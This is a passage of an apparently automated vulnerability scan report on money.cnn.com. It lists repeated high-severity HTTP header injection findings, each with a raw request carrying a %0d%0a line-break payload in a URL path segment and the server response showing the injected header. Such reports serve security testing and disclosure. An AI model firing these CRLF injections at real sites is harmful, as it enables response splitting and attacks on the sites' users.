...[SNIP]...

4.20. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9d058%0d%0a1bf56faaac5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/9d058%0d%0a1bf56faaac5/05/02/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/9d058
1bf56faaac5
/05/02/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 344
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/9d058
1bf56faaac5/05/02/r
...[SNIP]...

4.21. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ec1d9%0d%0a9b4a48b1ec3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/ec1d9%0d%0a9b4a48b1ec3/02/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/ec1d9
9b4a48b1ec3
/02/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/ec1d9
9b4a48b1ec3/02
...[SNIP]...

4.22. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 30187%0d%0ad728de29929 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/30187%0d%0ad728de29929/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/30187
d728de29929
/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/30187
d728de29929
...[SNIP]...

4.23. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload af131%0d%0a1082710a90d was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/af131%0d%0a1082710a90d/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/af131
1082710a90d
/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/af131
1082710a
...[SNIP]...

4.24. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 7fe5b%0d%0af797b3b6d6e was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/real_estate/7fe5b%0d%0af797b3b6d6e/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/real_estate/7fe5b
f797b3b6d6e
/index.htm
Vary: Accept-Encoding
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/real_estate/7fe
...[SNIP]...

4.25. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 1e387%0d%0a1eb5ea7f25 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/1e387%0d%0a1eb5ea7f25 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/real_estate/home-sale-strategies.moneymag/1e387
1eb5ea7f25

Vary: Accept-Encoding
Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/real_estate/hom
...[SNIP]...

4.26. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f99ed%0d%0a85c2e16168 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/f99ed%0d%0a85c2e16168/05/03/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/f99ed
85c2e16168
/05/03/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/f99ed
85c2e16168/05/03/pf
...[SNIP]...

4.27. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3deb8%0d%0a85daf08f43d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/3deb8%0d%0a85daf08f43d/03/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/3deb8
85daf08f43d
/03/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/3deb8
85daf08f43d/03
...[SNIP]...

4.28. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 4ed98%0d%0a4018d3b4574 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/4ed98%0d%0a4018d3b4574/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/4ed98
4018d3b4574
/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/4ed98
4018d3b4574
...[SNIP]...

4.29. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d15ab%0d%0a85e45e0a9d3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/d15ab%0d%0a85e45e0a9d3/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/d15ab
85e45e0a9d3
/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/d15ab
85e45e0a
...[SNIP]...

4.30. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload ffef4%0d%0aa029c46ab0e was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/ffef4%0d%0aa029c46ab0e/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/ffef4
a029c46ab0e
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/ffef4
a029c
...[SNIP]...

4.31. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload c3f49%0d%0aac654ae67d3 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/c3f49%0d%0aac654ae67d3 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/credit_card_fraud_identity_theft/c3f49
ac654ae67d3

Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/credit_card_
...[SNIP]...

4.32. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fcac7%0d%0a4dfd18c6daa was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/fcac7%0d%0a4dfd18c6daa/05/03/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/fcac7
4dfd18c6daa
/05/03/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/fcac7
4dfd18c6daa/05/03/p
...[SNIP]...

4.33. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 50f15%0d%0a1c251ebbaa7 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/50f15%0d%0a1c251ebbaa7/03/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/50f15
1c251ebbaa7
/03/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/50f15
1c251ebbaa7/03
...[SNIP]...

4.34. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 93a04%0d%0adbe11b730ea was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/93a04%0d%0adbe11b730ea/pf/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/93a04
dbe11b730ea
/pf/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/93a04
dbe11b730ea
...[SNIP]...

4.35. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 42731%0d%0a50eb27b4a8a was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/42731%0d%0a50eb27b4a8a/high_gas_prices_hurt/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/42731
50eb27b4a8a
/high_gas_prices_hurt/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/42731
50eb27b4
...[SNIP]...

4.36. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b3cce%0d%0a9574cc509ac was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/b3cce%0d%0a9574cc509ac/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/b3cce
9574cc509ac
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/b3cce
9574c
...[SNIP]...

4.37. http://money.cnn.com/rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/high_gas_prices_hurt/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload a510a%0d%0a638aad50604 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/high_gas_prices_hurt/a510a%0d%0a638aad50604 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/high_gas_prices_hurt/a510a
638aad50604

Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/high_gas_pri
...[SNIP]...

4.38. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7112f%0d%0a0257b7a00de was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/7112f%0d%0a0257b7a00de/05/03/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:38 GMT
Server: Apache
Location: http://money.cnn.com/7112f
0257b7a00de
/05/03/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/7112f
0257b7a00de/05/03/p
...[SNIP]...

4.39. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 73b9f%0d%0a39944a406a4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/73b9f%0d%0a39944a406a4/03/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/73b9f
39944a406a4
/03/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/73b9f
39944a406a4/03
...[SNIP]...

4.40. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload cc226%0d%0a09f5b65eab6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/cc226%0d%0a09f5b65eab6/pf/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/cc226
09f5b65eab6
/pf/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 335
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/cc226
09f5b65eab6
...[SNIP]...

4.41. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d94a7%0d%0aefdca2f4b0 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/d94a7%0d%0aefdca2f4b0/saving/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/d94a7
efdca2f4b0
/saving/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 334
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/d94a7
efdca2f4
...[SNIP]...

4.42. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload b0d38%0d%0aef7cdccc242 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/b0d38%0d%0aef7cdccc242/caeer_goals.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/b0d38
ef7cdccc242
/caeer_goals.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 331
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/b0d38
ef7cd
...[SNIP]...

4.43. http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 386d0%0d%0ac1a44c784d0 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/saving/386d0%0d%0ac1a44c784d0/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/saving/386d0
c1a44c784d0
/index.htm
Vary: Accept-Encoding
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
